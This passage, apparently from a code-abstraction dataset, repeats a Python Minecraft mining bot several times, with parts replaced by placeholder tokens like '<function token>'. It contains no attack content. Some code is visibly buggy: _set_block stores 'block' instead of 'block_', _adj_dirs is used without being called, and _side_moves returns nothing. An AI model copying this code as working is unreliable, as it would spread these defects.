block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
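(Each action is a dict such as {'func': '_move', 'args': (pos,)};
        take_action dispatches it with getattr.) 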
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def 
_get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
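The change is buffered locally rather than written to the world;
        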
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
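(The list concatenates the results of _get_move_actions,
        _get_mine_actions, and _get_placement_actions.) 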
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = 
self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, 